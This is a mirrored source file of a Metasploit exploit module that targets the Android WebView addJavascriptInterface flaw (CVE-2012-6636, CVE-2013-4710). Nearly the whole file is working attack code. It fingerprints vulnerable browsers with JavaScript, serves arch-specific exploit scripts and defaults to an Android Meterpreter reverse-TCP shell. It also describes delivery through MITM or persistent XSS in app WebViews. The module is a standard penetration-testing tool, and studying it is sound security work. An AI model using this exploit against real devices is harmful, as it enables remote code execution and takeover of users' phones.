Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/browser/webview_addjavascriptinterface.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10
  include Msf::Exploit::Remote::BrowserAutopwn

11
  include Msf::Exploit::Android

12


13
  VULN_CHECK_JS = %|

14
    for (i in top) {

15
      try {

16
        top[i].getClass().forName('java.lang.Runtime');

17
        is_vuln = true; break;

18
      } catch(e) {}

19
    }

20
  |

21


22
  autopwn_info(

23
    os_name: OperatingSystems::Match::ANDROID,

24
    arch: ARCH_ARMLE,

25
    javascript: true,

26
    rank: ExcellentRanking,

27
    vuln_test: VULN_CHECK_JS

28
  )

29


30
  def initialize(info = {})

31
    super(

32
      update_info(

33
        info,

34
        'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',

35
        'Description' => %q{

36
          This module exploits a privilege escalation issue in Android < 4.2's WebView component

37
          that arises when untrusted JavaScript code is executed by a WebView that has one or more

38
          Interfaces added to it. The untrusted JavaScript code can call into the Java Reflection

39
          APIs exposed by the Interface and execute arbitrary commands.

40


41
          Some distributions of the Android Browser app have an addJavascriptInterface

42
          call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs

43
          4.1.2 release of Android is known to be vulnerable.

44


45
          A secondary attack vector involves the WebViews embedded inside a large number

46
          of Android applications. Ad integrations are perhaps the worst offender here.

47
          If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS

48
          into the page displayed in the WebView, then you can inject the html/js served

49
          by this module and get a shell.

50


51
          Note: Adding a .js to the URL will return plain javascript (no HTML markup).

52
        },

53
        'License' => MSF_LICENSE,

54
        'Author' => [

55
          'jduck', # original msf module

56
          'joev'   # static server

57
        ],

58
        'References' => [

59
          ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],

60
          ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],

61
          ['URL', 'http://50.56.33.56/blog/?p=314'],

62
          ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],

63
          ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],

64
          ['CVE', '2012-6636'], # original CVE for addJavascriptInterface

65
          ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)

66
          ['EDB', '31519'],

67
          ['OSVDB', '97520']

68
        ],

69
        'Platform' => ['android', 'linux'],

70
        'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],

71
        'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },

72
        'Targets' => [ [ 'Automatic', {} ] ],

73
        'DisclosureDate' => '2012-12-21',

74
        'DefaultTarget' => 0,

75
        'Notes' => {

76
          'SideEffects' => [ ARTIFACTS_ON_DISK ],

77
          'Reliability' => [ UNRELIABLE_SESSION ],

78
          'Stability' => [ CRASH_SAFE ]

79
        },

80
        'BrowserRequirements' => {

81
          source: 'script',

82
          os_name: OperatingSystems::Match::ANDROID,

83
          vuln_test: VULN_CHECK_JS,

84
          vuln_test_error: 'No vulnerable Java objects were found in this web context.'

85
        }

86
      )

87
    )

88


89
    deregister_options('JsObfuscate')

90
  end

91


92
  # Hooked to prevent BrowserExploitServer from attempting to do JS detection

93
  # on requests for the static javascript file

94
  def on_request_uri(cli, req)

95
    if req.uri =~ /\.js/

96
      serve_static_js(cli, req)

97
    else

98
      super

99
    end

100
  end

101


102
  # The browser appears to be vulnerable, serve the exploit

103
  def on_request_exploit(cli, _req, browser)

104
    arch = normalize_arch(browser[:arch])

105
    print_status "Serving #{arch} exploit..."

106
    send_response_html(cli, html(arch))

107
  end

108


109
  # Called when a client requests a .js route.

110
  # This is handy for post-XSS.

111
  def serve_static_js(cli, req)

112
    arch = req.qstring['arch']

113
    response_opts = { 'Content-type' => 'text/javascript' }

114


115
    if arch.present?

116
      print_status("Serving javascript for arch #{normalize_arch arch}")

117
      send_response(cli, add_javascript_interface_exploit_js(normalize_arch(arch)), response_opts)

118
    else

119
      print_status('Serving arch detection javascript')

120
      send_response(cli, static_arch_detect_js, response_opts)

121
    end

122
  end

123


124
  # This is served to requests for the static .js file.

125
  # Because we have to use javascript to detect arch, we have 3 different

126
  # versions of the static .js file (x86/mips/arm) to choose from. This

127
  # small snippet of js detects the arch and requests the correct file.

128
  def static_arch_detect_js

129
    %|

130
      var arches = {};

131
      arches['#{ARCH_ARMLE}']  = /arm/i;

132
      arches['#{ARCH_MIPSLE}'] = /mips/i;

133
      arches['#{ARCH_X86}']    = /x86/i;

134


135
      var arch = null;

136
      for (var name in arches) {

137
        if (navigator.platform.toString().match(arches[name])) {

138
          arch = name;

139
          break;

140
        }

141
      }

142


143
      if (arch) {

144
        // load the script with the correct arch

145
        var script = document.createElement('script');

146
        script.setAttribute('src', '#{get_uri}/#{Rex::Text.rand_text_alpha(5)}.js?arch='+arch);

147
        script.setAttribute('type', 'text/javascript');

148


149
        // ensure body is parsed and we won't be in an uninitialized state

150
        setTimeout(function(){

151
          var node = document.body \|\| document.head;

152
          node.appendChild(script);

153
        }, 100);

154
      }

155
    |

156
  end

157


158
  # @return [String] normalized client architecture

159
  def normalize_arch(arch)

160
    SUPPORTED_ARCHES.include?(arch) ? arch : DEFAULT_ARCH

161
  end

162


163
  def html(arch)

164
    "<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"

165
  end

166
end

167


168